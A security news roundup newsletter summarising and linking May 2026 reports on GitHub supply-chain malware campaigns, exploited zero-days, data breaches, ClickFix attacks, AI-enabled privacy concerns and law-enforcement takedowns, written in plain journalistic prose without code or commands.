Researchers in Germany are warning that ordinary WiFi networks could soon become a powerful new form of invisible surveillance. By combining standard wireless signals with AI, the team demonstrated a camera-like system capable of identifying people with nearly 100% accuracy, even if they weren’t carrying a WiFi-connected device. It’s a capability that could easily become a dictator's dream and a personal privacy nightmare.

Meanwhile, in more pedestrian security news, a malware-spreading scumbag is swimming through GitHub. The automated campaign, dubbed Megalodon, has pushed malicious commits to more than 5,500 repositories. As Ox Security lead researcher Moshe Siman Tov Bustan explains, the trap relies on tricking maintainers: if a repository owner merges the predatory commit, CI/CD credential-stealing malware executes directly inside their pipeline to propagate the infection further.

Also on our radar this week: The U.S. Cybersecurity and Infrastructure Security Agency (CISA) finally fixed a major blunder after it was caught leaving its own digital cloud storage keys exposed in plain text on GitHub. On the artificial intelligence front, the US government suspended public access to civil transportation accident databases after internet sleuths controversially used AI to recreate the final vocal recordings of deceased pilots from fatal crash transcripts. Finally, convenience store giant 7-Eleven confirmed its corporate systems were compromised in a cyberattack claimed by the notorious ShinyHunters extortion group.

Subscribe to this newsletter.

Researchers in Germany are warning that ordinary WiFi networks could become a powerful new form of invisible surveillance. Using standard wireless signals and artificial intelligence, they demonstrated a system capable of identifying people with striking accuracy, even if those individuals are not carrying an active device.
https://www.sciencedaily.com/releases/2026/05/260522023127.htm

A malware-spreading scumbag swimming through GitHub pushed malicious commits to more than 5,500 repositories on Monday as part of an automated campaign called Megalodon. Similar to the earlier TeamPCP attacks that poisoned about 3,800 GitHub repositories, this new campaign has so far infected 5,561 repos with CI/CD credential-stealing malware, according to SafeDep researchers, who uncovered the predatory commits and published a full list of the compromised repositories. If a repository owner merges the commit, the malware executes inside their CI/CD pipeline and propagates further, Ox Security lead researcher Moshe Siman Tov Bustan said in a Thursday blog post.
https://www.theregister.com/security/2026/05/22/megalodon-chums-the-waters-in-55k-github-repo-poisonings/5245342

Megalodon: Mass GitHub Repo Backdooring via CI Workflows - Real-time Open Source Software Supply Chain Security

Over 5,700 malicious commits were pushed to GitHub repositories on May 18, 2026, replacing GitHub Actions workflows with base64-encoded secret exfiltration payloads. The "megalodon" campaign targeted repos including Tiledesk (9 repos), Black-Iron-Project (8 repos), and hundreds of others. @tiledesk/tiledesk-server versions 2.18.6-2.18.12 on npm carry the backdoor. C2: 216.126.225.129:8443.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has been leaving the digital keys to its own cloud storage accounts sitting out in the open, in plain text form, for some unknown amount of time, according to a report from Krebs on Security. The problem finally got fixed over the weekend, the report says.
https://gizmodo.com/the-worst-leak-that-ive-witnessed-u-s-cybersecurity-agency-leaves-its-digital-keys-out-in-public-on-github-2000760330

Microsoft-owned code-hosting platform GitHub on Wednesday morning confirmed that approximately 3,800 internal repositories were impacted in a supply chain attack. On Tuesday, the infamous hacking group TeamPCP, known for a series of recent supply chain attacks targeting the open source software community, claimed the hack of 4,000 GitHub internal repositories. Boasting about the incident on an underground hacking forum, the threat actor claimed the theft of source code and internal orgs, offering the allegedly stolen information to any buyer willing to pay at least $50,000 for it.
https://www.securityweek.com/github-confirms-hack-impacting-3800-internal-repositories/

34 unique packages compromised, 380-plus affected versions, three major registries hit simultaneously, and a target list that reads like a who’s-who of high-value developer environments like cryptocurrency wallets, DeFi tooling, AI development, and smart contract auditing.
https://thecybersecguru.com/news/trapdoor-supply-chain-attack/

Pilots’ voices from the last seconds of a fatal cargo plane crash have been re-created by Internet sleuths using software and AI tools. The spread of reconstructed audio recordings has prompted a US government agency to suspend all public access to its database of civil transportation accidents—because federal law prohibits investigators from publicly releasing audio from cockpit voice recorders.
https://arstechnica.com/ai/2026/05/ai-users-re-create-dead-pilots-voices-from-crash-investigation-docs/

The Trump administration is building a surveillance network to spy on its own workforce across multiple agencies. It has already given Palantir an initial $3.9 million to do so at the Department of Agriculture (USDA), federal spending disclosures show.
https://prospect.org/2026/05/18/palantir-federal-workers-surveillance-usda-social-security-veterans-affairs/

An apparel site from FBI director Kash Patel has been spotted trying to trick macOS users into installing malware. The site, BasedApparel.com, is part of a merchandise brand that Patel co-created with Andrew Ollis prior to becoming FBI director under the Trump administration. On Thursday, a user based in Portugal spotted the online shop hosting a “ClickFix”-style attack that tries to dupe unsuspecting users into running a malicious command on their Mac computers.
https://ca.pcmag.com/security/15815/kash-patels-apparel-site-is-trying-to-trick-visitors-into-installing-malware

 On Wednesday, Microsoft started rolling out security patches for two Defender vulnerabilities that have been exploited in zero-day attacks. The first one, tracked as CVE-2026-41091, is a privilege escalation security flaw affecting Microsoft Malware Protection Engine 1.1.26030.3008 and earlier, which provides the scanning, detection, and cleaning capabilities for Microsoft antivirus and antispyware software. This flaw stems from an improper link resolution before file access, which allows attackers to gain SYSTEM privileges.
https://www.bleepingcomputer.com/news/security/microsoft-warns-of-new-defender-zero-days-exploited-in-attacks/

Security researchers have uncovered a new social engineering scam that uses deceptive pop-ups and fake warnings to trick users into believing their device has been compromised, prompting them to use fraudulent IT helpdesks. This strain is a particularly sophisticated, browser-based version, security firm Barracuda warns, as the malicious code is hidden and can only be activated if the right (poor) security conditions are in place.
https://cybernews.com/security/millions-hit-scareware-attack-fake-it-helpdesks/

Google on Wednesday published exploit code for an unfixed vulnerability in its Chromium browser codebase that threatens millions of people using Chrome, Microsoft Edge, and virtually all other Chromium-based browsers. The proof-of-concept code exploits the Browser Fetch programming interface, a standard that allows long videos and other large files to be downloaded in the background. An attacker can use the exploit to create a connection for monitoring some aspects of a user’s browser usage and as a proxy for viewing sites and launching denial-of-service attacks. Depending on the browser, the connections either reopen or remain open even after it or the device running it has rebooted.
https://arstechnica.com/security/2026/05/google-publishes-exploit-code-threatening-millions-of-chromium-users/

Convenience store chain giant 7-Eleven confirmed that its systems were breached in a cyberattack claimed by the ShinyHunters extortion group last month. Founded in 1927, 7-Eleven now operates, franchises, and licenses over 86,000 stores globally, including 13,000 stores in the U.S. and Canada, while its 7Rewards and Speedy Rewards loyalty programs have more than 100 million members.
https://www.bleepingcomputer.com/news/security/7-eleven-confirms-data-breach-claimed-by-the-shinyhunters-gang/

A large-scale campaign is exploiting a critical SQL injection vulnerability (CVE-2026-26980) in Ghost CMS to inject malicious JavaScript code that triggers ClickFix attack flows. The campaign was discovered by XLab threat intelligence researchers at Chinese cybersecurity company Qianxin, who confirmed impact on more than 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs.
https://www.bleepingcomputer.com/news/security/ghost-cms-sql-injection-flaw-exploited-in-large-scale-clickfix-campaign/

Threat actors are exploiting a vulnerability in shared content delivery network (CDN) infrastructure to hide connections to malicious domains. Dubbed Underminr, the issue is a variant of domain fronting, a now-mitigated type of attack that enabled threat actors to place an allowed domain in the SNI and TLS certificate validation fields of an HTTPS request, while embedding a different target domain in the TLS tunnel’s encrypted HTTP host header.
https://www.securityweek.com/underminr-vulnerability-lets-attackers-hide-malicious-connections-behind-trusted-domains/

A supply chain attack targeting the Laravel Lang localization packages has exposed developers to a sophisticated credential-stealing malware campaign after attackers abused GitHub version tags to distribute malicious code through Composer packages.
https://www.bleepingcomputer.com/news/security/laravel-lang-packages-hijacked-to-deploy-credential-stealing-malware/

Drupal is warning users that it’s already seeing attempts to exploit CVE-2026-9082, the highly critical vulnerability patched this week. The vulnerability affects an API designed to ensure that database queries are sanitized to prevent SQL injection. “A vulnerability in this API allows an attacker to send specially crafted requests, resulting in arbitrary SQL injection for sites using PostgreSQL databases,” Drupal explains.
https://www.securityweek.com/drupal-vulnerability-in-hacker-crosshairs-shortly-after-disclosure/

The US Justice Department announced on Thursday that a Canadian man has been arrested for operating the recently disrupted Kimwolf DDoS botnet. The suspect, 23-year-old Jacob Butler of Ottawa, known online as ‘Dort’, is accused of administering the botnet and has been charged in the US on one count of aiding and abetting computer intrusion. Butler has been arrested in Canada and the US is seeking his extradition. If found guilty, he faces up to 10 years in prison.
https://www.securityweek.com/canadian-man-arrested-for-operating-kimwolf-botnet/

According to the FBI, First VPN has been active since 2014, providing 32 exit nodes across 27 countries at the time of its disruption. The service, advertised on Russian-language dark web cybercrime forums, has been used by at least 25 ransomware groups for network reconnaissance and intrusions. IP addresses associated with First VPN have been involved in scanning, botnets, DoS attacks, and hacking. The FBI has published an alert with technical details, IoCs, MITRE ATT&CK mappings, and recommendations. According to Europol, law enforcement and partners dismantled 33 servers linked to First VPN and disrupted the infrastructure that supported cybercriminal activity. The takedown targeted the 1vpns.com, 1vpns.net, 1vpns.org, and onion domains.
https://www.securityweek.com/first-vpn-cybercrime-service-disrupted-administrator-arrested/

TrendAI, Trend Micro’s enterprise business, has informed customers that it has patched another Apex One vulnerability that has been exploited in the wild. The zero-day, tracked as CVE-2026-34926, is a medium-severity directory traversal issue that can be exploited by an unauthenticated local attacker to “modify a key table on the server to inject malicious code to deploy to agents on affected installations”.TrendAI noted that the attacker requires admin credentials to the server, and the attack only works against the on-premises version of Apex One.
https://www.securityweek.com/trendai-patches-apex-one-zero-day-exploited-in-the-wild/

Threat actors brute-forced VPN credentials and bypassed multi-factor authentication (MFA) on SonicWall Gen6 SSL-VPN appliances to deploy tools used in ransomware attacks. During the intrusions, the hacker took between 30 and 60 minutes to log in, do network reconnaissance, test credential reuse on internal systems, and log out. SonicWall warned in a security advisory for CVE-2024-12802 that installing the firmware update alone on Gen6 devices does not fully mitigate the vulnerability, and a manual reconfiguration of the LDAP server is required. Failing to do so leaves open the possibility of bypassing MFA protection.
https://www.bleepingcomputer.com/news/security/hackers-bypass-sonicwall-vpn-mfa-due-to-incomplete-patching/